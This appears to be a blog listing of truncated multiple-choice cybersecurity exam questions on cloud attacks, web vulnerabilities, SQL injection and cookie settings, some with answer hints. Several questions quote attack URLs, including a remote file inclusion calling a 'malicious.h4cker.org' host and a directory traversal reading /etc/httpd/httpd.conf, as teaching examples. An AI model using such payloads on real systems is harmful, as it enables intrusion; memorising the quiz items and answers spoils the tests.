Which cloud technology attack method could exploit a bug in a software application to gain access to resources that normally would not be accessible to a user?

  • Post author:
  • Post category:Blog
  • Post comments:0 Comments
  • Post last modified:June 12, 2024
  • Reading time:1 mins read

Which cloud technology attack method could exploit a bug in a software application to gain access to resources that normally would not be accessible to a user? account takeover credential…

Which cloud technology attack method involves breaching the infrastructure to gather and steal information such as valid usernames, passwords, tokens, and PINs?

Which cloud technology attack method involves breaching the infrastructure to gather and steal information such as valid usernames, passwords, tokens, and PINs? account takeover credential harvesting privilege escalation side-channel attacks…

Which term is an essential characteristic of cloud computing as defined in NIST SP 800-145?

Which term is an essential characteristic of cloud computing as defined in NIST SP 800-145? centralized storage resource pooling reduced bandwidth requirements slow elasticity Explanation & Hint: NIST SP 800-145…

What is the best practice to mitigate the vulnerabilities from a lack of proper error handling in an application?

What is the best practice to mitigate the vulnerabilities from a lack of proper error handling in an application? Use only a minimum set of error messages.  Use a strong…

Because of an insecure code practice, an attacker can leverage and completely compromise an application or the underlying system. What insecure code practice enabled this catastrophic threat?

Because of an insecure code practice, an attacker can leverage and completely compromise an application or the underlying system. What insecure code practice enabled this catastrophic threat? lack of error…

Which type of vulnerability did the attacker try to exploit?

An attacker enters the following URL to exploit vulnerabilities in a web application: http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html Which type of vulnerability did the attacker try to exploit? directory traversal  cookie manipulation  local file…

Which type of web vulnerability is being exploited by the attacker?

After some reconnaissance efforts, an attacker identified a web server hosted on a Linux system. The attacker then entered the URL shown below, http://192.168.46.82:45/vulnerabilities/fi/?page=../../../../../etc/httpd/httpd.conf Which type of web vulnerability is…

According to OWASP, which three statements are rules to prevent XSS attacks? (Choose three.)

According to OWASP, which three statements are rules to prevent XSS attacks? (Choose three.) Use the HTML <a> tag with JavaScript encoding.  Use HTTPS only mode for accessing web applications. …

Which type of vulnerability does the attacker try to exploit?

An attacker sends a request to an online university portal site with the information: https://portal.a-univ.edu/?search=students&results=50&search=staff Which type of vulnerability does the attacker try to exploit? redirect  session hijacking  default credential …

An organization has developed a network security policy stating that newly purchased routers and switches must be configured with advanced security measures before deploying them to the production network. Which threat does this policy mitigate?

An organization has developed a network security policy stating that newly purchased routers and switches must be configured with advanced security measures before deploying them to the production network. Which…

A web application configures client cookies with the HTTPOnly flag. What is the effect of this flag?

A web application configures client cookies with the HTTPOnly flag. What is the effect of this flag? It informs the web client that the cookie is a persistent cookie.  It…

What is a potentially dangerous web session management practice?

What is a potentially dangerous web session management practice? including the session ID in the URL  setting a cookie with the Expires attribute  setting a cookie with the Max-Age attribute …

A company uses the Microsoft Active Directory service to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type of penetration testing can be used to verify the proper configuration of the Active Directory service?

A company uses the Microsoft Active Directory service to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type…

Which type of SQL query is in the SQL statement select * from users where user = "admin";?

Which type of SQL query is in the SQL statement select * from users where user = "admin";? static query stacked query  out-of-band query  parameterized query  Explanation & Hint: The…

An attacker launches an SQL injection attack on a web application by trying to force the application requesting the back-end database to perform multiple SELECT queries. Which technique exploits the SQL injection vulnerability on the web application?

An attacker launches an SQL injection attack on a web application by trying to force the application requesting the back-end database to perform multiple SELECT queries. Which technique exploits the…

A threat actor launches an SQL injection attack against a web site by sending multiple specific statements to the web site and reconstructing the key information the threat actor seeks. What type of SQL injection attack is the threat actor using?

A threat actor launches an SQL injection attack against a web site by sending multiple specific statements to the web site and reconstructing the key information the threat actor seeks.…

Which statement describes an example of an out-of-band SQL injection attack?

Which statement describes an example of an out-of-band SQL injection attack? An attacker launches the attack on a web site and forces the web application to delay the query results. …

Which component in the statement below is most likely user input on a web form?

Which component in the statement below is most likely user input on a web form? SELECT * FROM group WHERE attack = 'network' AND a-type LIKE 'ping%'; ping  group  attack …

Which international organization is dedicated to educating industry professionals, creating tools, and evangelizing best practices for securing web applications and underlying systems?

Which international organization is dedicated to educating industry professionals, creating tools, and evangelizing best practices for securing web applications and underlying systems? Common Vulnerabilities and Exposures (CVE)  Open Web Application…

Which two attributes can be set in a web application cookie to indicate it is a persistent cookie? (Choose two.)

Which two attributes can be set in a web application cookie to indicate it is a persistent cookie? (Choose two.) Expires  Max-Age  Domain  Secure  Path Explanation & Hint: Session management…
